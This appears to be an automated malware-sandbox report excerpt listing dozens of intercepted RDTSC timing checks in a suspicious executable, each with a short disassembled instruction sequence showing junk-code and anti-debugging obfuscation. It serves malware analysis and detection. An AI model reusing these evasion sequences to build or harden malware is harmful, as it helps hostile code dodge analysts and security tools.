                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1188890 second address: 11888FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F65CD2EDEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F65CD2EDEE8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F65CD2EDEE8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D356Dh] 0x00000050 mov edi, dword ptr [ebp+122D3741h] 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187A99 second address: 1187AC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CC527CA7h 0x00000008 jmp 00007F65CC527CA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65CC527CA1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11888FD second address: 1188920 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CD2EDEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F65CD2EDEF3h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1188920 second address: 1188926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187AC9 second address: 1187ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187B59 second address: 1187B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F65CC527C96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11898B7 second address: 11898C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118A7A4 second address: 118A7AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118A7AA second address: 118A7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CD2EDEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118C8BB second address: 118C8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118D8D6 second address: 118D8F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F65CD2EDEEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118D8F3 second address: 118D8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118D8F8 second address: 118D909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1189997 second address: 11899A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11899A1 second address: 1189A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F65CD2EDEE8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 call 00007F65CD2EDEF9h 0x0000002b sub dword ptr [ebp+122D323Eh], eax 0x00000031 pop edi 0x00000032 mov edi, dword ptr [ebp+122D3785h] 0x00000038 push dword ptr fs:[00000000h] 0x0000003f mov ebx, dword ptr [ebp+122D1964h] 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F65CD2EDEE8h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000017h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D1BDCh], esi 0x0000006c mov ebx, dword ptr [ebp+122D18FEh] 0x00000072 mov eax, dword ptr [ebp+122D173Dh] 0x00000078 push FFFFFFFFh 0x0000007a mov dword ptr [ebp+122D232Dh], eax 0x00000080 push eax 0x00000081 pushad 0x00000082 push ecx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1189A48 second address: 1189A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F65CC527CA8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118E9CF second address: 118E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118E9D3 second address: 118E9E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EB7B second address: 118EB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EB81 second address: 118EB85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190B23 second address: 1190B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEEFh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F65CD2EDEE8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3245h], eax 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D22EDh], edx 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b jo 00007F65CD2EDEECh 0x00000041 jnl 00007F65CD2EDEE6h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EB85 second address: 118EC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, B17Fh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D315Eh], edi 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F65CC527C98h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e jc 00007F65CC527C9Ch 0x00000044 mov edi, dword ptr [ebp+122D3631h] 0x0000004a mov eax, dword ptr [ebp+122D00A5h] 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F65CC527C98h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a push FFFFFFFFh 0x0000006c pushad 0x0000006d sub edx, 6CB4EA04h 0x00000073 sub ebx, dword ptr [ebp+122D34E1h] 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007F65CC527C9Dh 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190B79 second address: 1190B9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EC20 second address: 118EC26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190B9B second address: 1190BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EC26 second address: 118EC2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190BAA second address: 1190BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F65CD2EDEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118FCCD second address: 118FCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119841A second address: 1198426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F65CD2EDEF2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD37 second address: 119CD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD3B second address: 119CD55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F65CD2EDEE6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F65CD2EDEE8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD55 second address: 119CD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD5F second address: 119CD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD63 second address: 119CD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD72 second address: 119CD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CEED second address: 119CEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2E72 second address: 11A2E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F65CD2EDEE6h 0x0000000a jmp 00007F65CD2EDEF3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B56 second address: 11A1B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F65CC527CA9h 0x0000000a jmp 00007F65CC527C9Dh 0x0000000f jbe 00007F65CC527C96h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B73 second address: 11A1B90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F65CD2EDEE6h 0x00000009 jmp 00007F65CD2EDEEBh 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F65CD2EDEE6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B90 second address: 11A1B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B96 second address: 11A1BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1BA3 second address: 11A1BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1BA7 second address: 11A1BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F65CD2EDF00h 0x0000000c jmp 00007F65CD2EDEF4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A25BE second address: 11A25D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007F65CC527C9Eh 0x0000000b jnl 00007F65CC527C96h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2760 second address: 11A2766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2A24 second address: 11A2A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2A2A second address: 11A2A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A7F88 second address: 11A7F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8797 second address: 11A87A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F65CD2EDEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8939 second address: 11A893D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A893D second address: 11A8954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8A9D second address: 11A8AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8AA8 second address: 11A8ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F65CD2EDEE8h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F65CD2EDEF3h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8DA3 second address: 11A8DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A919C second address: 11A91A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AADE2 second address: 11AAE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F65CC527C96h 0x0000000a pop esi 0x0000000b jmp 00007F65CC527CA6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AC3E2 second address: 11AC3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117DA20 second address: 117DA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117DB9F second address: 117DBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117E298 second address: 117E2C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65CC527C9Ch 0x00000008 jl 00007F65CC527C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F65CC527C9Fh 0x00000019 jnl 00007F65CC527C96h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117E447 second address: 117E44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117E44B second address: 117E454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AFC09 second address: 11AFC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEF7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AFC24 second address: 11AFC30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AFEC6 second address: 11AFECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B01C6 second address: 11B01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B01CD second address: 11B01D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BB5 second address: 11B5BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BBE second address: 11B5BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BC2 second address: 11B5BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BC8 second address: 11B5BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5F21 second address: 11B5F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65CC527C96h 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5F31 second address: 11B5F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B61B9 second address: 11B61C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5895 second address: 11B58B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65CD2EDEF4h 0x0000000b pushad 0x0000000c jns 00007F65CD2EDEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B58B8 second address: 11B58BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B58BE second address: 11B58C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B6625 second address: 11B662B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B662B second address: 11B6631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68D9 second address: 11B68DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68DD second address: 11B68E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68E7 second address: 11B68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F65CC527C96h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68FD second address: 11B6901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
